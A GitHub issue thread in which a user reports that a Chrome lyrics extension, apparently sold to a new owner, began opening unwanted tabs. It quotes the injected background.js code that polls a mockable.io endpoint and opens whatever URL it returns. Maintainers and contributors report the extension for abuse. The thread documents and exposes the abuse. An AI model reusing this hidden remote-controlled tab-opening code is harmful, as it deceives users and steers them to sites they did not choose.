### ISSUE TITLE
The extension opens a new tab with external site automatically

### ISSUE THREAD

**Issue by nikita-vanyasin** [erichlotto/Play-Music-Lyrics-Fetcher#28]
## Preface:
- I've installed the extension from Google Chrome Store a month ago.
- I use ArchLinux environment with official Google Chrome package

## Problem:
After ~5 minutes of running browser, a new tab is opened automatically with URL like boredtravel.com

I searched through my google-chrome profile and found this code injected to 
`$HOME/.config/google-chrome/Default/Extensions/phnnoaooookpaffnminadcajmghibbbc/1.0.23_0/services/background.js`:
```
function intervalWebsite() {
setInterval(function() {
    $.ajax({
        url: "https://demo7530752.mockable.io/url",
        async: false,
        dataType: 'json',
        success: function(data) {
            var newURL = data.msg;
            chrome.tabs.create({
                url: newURL
            });;
        }
    });
}, 240 * 60 * 1000)
}
```

Some users reported a similar problem with other Chrome extensions here: https://www.reddit.com/r/techsupport/comments/djg42f/sites_i_have_never_been_on_before_opening_in_its/

Currently I've disabled the extension.
I hope it's not abuse and this is some security problem in Google Chrome or in extension itself. Any chances @erichlotto  can fix this issue or contact Chrome dev team to mitigate this issue?

**Comment by erichlotto** [comment]
Hi there, I recently sold the extension as I don't have time to work on it anymore, so it is no longer under my domain. Sorry for the inconvenience :(
I've removed the link to the chrome webstore from the README file and suggest you use the binary install instead if having any issues (/bin/extension.crx file)

Erich

**Comment by TiE23** [comment]
Well, it doesn't even work anymore. So since it's no longer under your control I don't feel bad reporting it for abuse.

Thanks for your work. I've enjoyed the extension for years.

**Comment by andykog** [comment]
Reported an abuse as well.
So disappointing to be a victim of a malware from the extension I've contributed to.
@erichlotto, I hope, they've paid well
